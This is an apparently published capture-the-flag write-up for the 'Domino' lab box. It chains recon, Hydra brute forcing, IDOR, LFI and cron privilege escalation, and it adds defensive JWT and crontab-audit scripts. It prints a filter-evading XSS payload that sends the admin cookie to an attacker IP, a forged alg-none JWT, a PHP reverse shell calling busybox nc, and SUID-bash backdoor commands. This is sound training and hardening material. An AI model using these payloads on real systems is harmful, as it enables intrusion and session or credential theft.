June 15, 2026
Domino CTF
Chain together vulnerabilities in a cascading attack, where every piece you find knocks over the next.
Rahul Dhakate
3 min read
Interestingly, this environment contains no traditional vulnerabilities; instead, it emphasizes misconfigurations across web applications, networks, and host systems. This makes it an excellent exercise in real-world exploitation scenarios.
Network Level Reconnaissance
Open Port Scanning
nmap -sS -p- 10.49.93.21
Service Enumeration
nmap -sS -sC -sV -p 22,80 10.49.93.21
- Port 22: SSH (used later for the devops login)
- Port 80: public-facing web application, the NexusCorp Portal
- Backend: Apache2 on Linux
Local DNS Resolution
echo "10.49.93.21 nexuscorp.thm" >> /etc/hosts
Web Application Analysis/Recon
- index.php: login page (username format: firstname.lastname)
- team.php: reveals the list of usernames
- forget.php: no immediate findings
- reset.php: requires a JWT token
Directory Enumeration
ffuf -u http://nexuscorp.thm/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -mc all -fs 275 -e .php,.txt,.json,.bak,.log,.api
(ffuf takes the target URL with -u; -h only prints the help text. -fs 275 filters the constant-size 404 responses.)
Important endpoints:
- auth.php
- config.php
Backup & Static Directories
- backup/: contains an encrypted binary, config.enc
- static/: contains the AES-128-ECB key, N3xusK3y2024!!
Decrypting the configuration:
openssl's -K expects the raw key as hex. N3xusK3y2024!! is only 14 bytes, so it is padded with two zero bytes to the 16 bytes AES-128 needs (openssl does this itself and prints a warning; the trailing 0000 below makes it explicit):
openssl enc -d -aes-128-ecb -in config.enc -out config.dec -K 4e337875734b33793230323421210000
Exploitation
IDOR Vulnerability
Brute-force the login with the usernames found in team.php using Hydra (the string "Invalid" marks a failed attempt):
hydra -L usernames.txt -P /usr/share/wordlists/rockyou.txt nexuscorp.thm http-post-form '/index.php:username=^USER^&password=^PASS^:Invalid'
Successful login as robert.wilson
Endpoints discovered:
- /api/files.php?name=
- /api/auth/token.php
- The profile API is vulnerable to IDOR: it takes an id parameter and performs no ownership check
Changing the id to 1 returns another user's profile and the first flag.
Stored XSS
Injecting the payload via a support ticket, which the admin later opens in a browser.
XSS payload to steal the admin's session cookie. The keywords fetch, document and cookie are split into concatenated strings (presumably to slip past a naive keyword filter), so they are looked up through bracket notation:
<IMG src=x onerror="window['fe'+'tch']('http://10.49.93.21:4444/?c='+window['doc'+'ument']['coo'+'kie'])">
- Captured admin cookie with Netcat listener
- Set the cookie
- Accessed the admin dashboard and obtained the second flag
Local File Inclusion (LFI)
Accessing sensitive files:
/api/files.php?name=/var/www/html/config.php
/api/files.php?name=/var/www/html/auth.php
The token the portal issues is signed with alg "none" (the header decodes to {"alg":"none","typ":"JWT"}) and carries an empty signature, so its payload (sub, role, iat, exp) can be edited freely and the server still accepts it. Presenting a token with role set to admin to the files endpoint let us read config.php and harvest the database credentials. The header used:
"Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsYXVyYS5oYXllcyIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc4MTUzMjc0MSwiZXhwIjoxNzgxNTM2MzQxfQ."
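The alg none weakness above, as an added example that is not part of the original write-up: the script decodes the captured token, rebuilds it byte-for-byte from the claims (showing that nothing but the claims go into an unsigned token), and contrasts a verifier that honours the alg header with one that insists on HS256 and a matching MAC. The secret key and the hardened verifier's policy are assumptions for illustration; only the token itself comes from the page.

```python
import base64
import hashlib
import hmac
import json

# Token quoted in the write-up: header {"alg":"none","typ":"JWT"}, empty signature.
CAPTURED = (
    "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0."
    "eyJzdWIiOiJsYXVyYS5oYXllcyIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTc4MTUzMjc0MSwiZXhwIjoxNzgxNTM2MzQxfQ."
)


def b64url_encode(raw: bytes) -> str:
    """JWT base64url: URL-safe alphabet, padding stripped."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url_encode; re-adds the padding the base64 module expects."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def decode_jwt(token: str):
    """Split a token into (header dict, payload dict, raw signature string) without verifying it."""
    h_b64, p_b64, sig = token.split(".")
    return json.loads(b64url_decode(h_b64)), json.loads(b64url_decode(p_b64)), sig


def signing_input(header: dict, payload: dict) -> str:
    """'header.payload' exactly as fed to the MAC: compact JSON, key order preserved."""
    compact = lambda obj: json.dumps(obj, separators=(",", ":")).encode()
    return b64url_encode(compact(header)) + "." + b64url_encode(compact(payload))


def forge_none_token(sub: str, role: str, iat: int, exp: int) -> str:
    """Unsigned alg=none token; any verifier that trusts the alg header accepts it."""
    header = {"alg": "none", "typ": "JWT"}
    payload = {"sub": sub, "role": role, "iat": iat, "exp": exp}
    return signing_input(header, payload) + "."


def sign_hs256(payload: dict, key: bytes) -> str:
    """Properly signed HS256 token, for comparison with the forged one (key is a made-up secret)."""
    header = {"alg": "HS256", "typ": "JWT"}
    body = signing_input(header, payload)
    mac = hmac.new(key, body.encode(), hashlib.sha256).digest()
    return body + "." + b64url_encode(mac)


def verify_jwt(token: str, key: bytes, allow_none: bool = False):
    """Return the payload if the token is acceptable, else None.

    allow_none=True models the vulnerable server: it reads alg from the header and
    treats "none" as "no signature required". The hardened path accepts only the
    algorithm the server itself issues (HS256 here) with a matching MAC.
    """
    try:
        h_b64, p_b64, sig = token.split(".")
        header = json.loads(b64url_decode(h_b64))
    except ValueError:  # wrong number of segments, bad base64 or bad JSON
        return None
    alg = header.get("alg")
    if alg == "none":
        return json.loads(b64url_decode(p_b64)) if allow_none else None
    if alg != "HS256":
        return None  # no algorithm confusion: anything else is rejected outright
    expected = hmac.new(key, f"{h_b64}.{p_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url_encode(expected), sig):
        return None
    return json.loads(b64url_decode(p_b64))


if __name__ == "__main__":
    header, payload, sig = decode_jwt(CAPTURED)
    print(header, payload, repr(sig))
    forged = forge_none_token("laura.hayes", "admin", 1781532741, 1781536341)
    print("reproduces captured token:", forged == CAPTURED)
    print("vulnerable verifier accepts:", verify_jwt(forged, b"server-secret", allow_none=True))
    print("hardened verifier accepts:", verify_jwt(forged, b"server-secret"))
```

The fix on the server side is the last branch of verify_jwt: pin the algorithm the application issues and treat "none" (and any other alg) as a verification failure rather than a choice the client gets to make.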
System Level Recon
SSH Access as DevOps:
From the CTF page and the decrypted config.enc we already knew a devops user existed. Using the credentials harvested from config.php, we attempted an SSH login:
ssh devops@10.49.141.39
This gave direct access to the system as devops and immediately revealed the fourth flag. By logging in as devops instead of pivoting through www-data we skipped the third-flag step, but in doing so we collected the third and fourth flags together.
Remote File Inclusion (RFI)
This step is for information only and can be skipped, since the previous step already gave us a login as devops.
Uploaded reverse shell:
shell.php
<?php exec("busybox nc 10.49.93.21 4001 -e bash"); ?>
File server:
python3 -m http.server
Listener:
nc -lvnp 4001
- Reverse shell established
- Third flag confirmed
note: Perform ssh login using devops for next steps
Privilege escalation:
- Used pspy64 to watch process activity and spot the scheduled (cron) jobs running as root
- The root-run scripts admin_bot.py and health_report.sh under /opt/monitoring were writable by devops, so we appended our own commands to health_report.sh:
vi /opt/monitoring/health_report.sh
cp /bin/bash /tmp/bash ; chmod u+s /tmp/bash
cp /root/root.txt /tmp/root.txt; chmod 777 /tmp/root.txt
- On the job's next run /tmp/bash was SUID root; running it with -p (so bash keeps the effective UID instead of dropping it) gave a root shell
- Final flag obtained
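The misconfiguration that made this escalation possible is a root cron job executing a script that a low-privileged user can write. The following check, an added example and not part of the write-up, parses system-crontab lines, pulls out the absolute paths each root job invokes and reports the ones that are writable, not owned by the trusted user, or sitting in a world-writable directory. The crontab text and the fixture files are constructed for the example; the script paths echo the ones named above but nothing here is the box's real configuration.

```python
import os
import re
import stat
import tempfile

# Constructed sample in /etc/crontab format (m h dom mon dow USER command); not the box's real crontab.
CRONTAB_SAMPLE = """\
# m h dom mon dow user command
SHELL=/bin/sh
*   *   *   *   *  root   /opt/monitoring/health_report.sh
*/5 *   *   *   *  root   /usr/bin/python3 /opt/monitoring/admin_bot.py
0   3   *   *   *  devops /home/devops/cleanup.sh
"""

PATH_RE = re.compile(r"(?<![\w-])/[\w./-]+")  # absolute paths inside a command string


def jobs_from_crontab(text: str):
    """Yield (user, [absolute paths in the command]) for each system-crontab entry."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # comment or environment assignment such as SHELL=/bin/sh
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        yield fields[5], PATH_RE.findall(fields[6])


def audit_path(path: str, trusted_uid: int = 0):
    """Reasons a script run from cron is a privilege-escalation target; empty list if none."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["missing (could be created by anyone who can write the directory)"]
    if st.st_uid != trusted_uid:
        findings.append(f"owned by uid {st.st_uid}, not uid {trusted_uid}")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    parent = os.stat(os.path.dirname(path) or "/")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        findings.append("parent directory world-writable without sticky bit (file can be replaced)")
    return findings


def audit_crontab(text: str, trusted_uid: int = 0, privileged_users=("root",)):
    """Map each path invoked by a privileged user's job to its findings (only flagged paths)."""
    report = {}
    for user, paths in jobs_from_crontab(text):
        if user not in privileged_users:
            continue
        for p in paths:
            findings = audit_path(p, trusted_uid)
            if findings:
                report[p] = findings
    return report


def make_sample_tree():
    """Constructed fixture: a loose (0777) and a tight (0755) script in a fresh temp directory."""
    d = tempfile.mkdtemp(prefix="cron_audit_")
    os.chmod(d, 0o755)
    loose = os.path.join(d, "health_report.sh")
    tight = os.path.join(d, "admin_bot.py")
    for p, mode in ((loose, 0o777), (tight, 0o755)):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(p, mode)
    return loose, tight


def demo():
    """Audit a crontab built over the fixture; returns (report, loose_path, tight_path).

    trusted_uid is the current user so the fixture's ownership is 'correct' and only
    the permission bits decide the outcome; on a real host keep the default of 0.
    """
    loose, tight = make_sample_tree()
    tab = f"* * * * * root {loose}\n*/5 * * * * root {tight}\n0 3 * * * devops {loose}\n"
    return audit_crontab(tab, trusted_uid=os.getuid()), loose, tight


if __name__ == "__main__":
    for path, why in demo()[0].items():
        print(path, "->", "; ".join(why))
    print("write-up paths on this host:", audit_crontab(CRONTAB_SAMPLE))
```

Run as root on the target with the real /etc/crontab (and the files in /etc/cron.d) to list every script a root job executes that someone else can change; the health_report.sh case above would show up as group- or world-writable.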
Conclusion & Recommendations
This CTF highlights how misconfigurations can be just as dangerous as traditional vulnerabilities. Key lessons include:
- Harden configurations: set proper file permissions, reject unsigned (alg none) JWTs and pin the expected algorithm, and do not expose backup or static directories containing keys.
- Validate user input: prevent IDOR with server-side ownership checks and XSS by encoding output and sanitizing requests.
- Least privilege principle: avoid running scheduled tasks as root unnecessarily, and never let a root job execute a script that a lower-privileged user can write.
- Logging & monitoring: detect brute-force attempts and unusual activity early.
- Defense in depth: combine secure coding, configuration management, and continuous monitoring.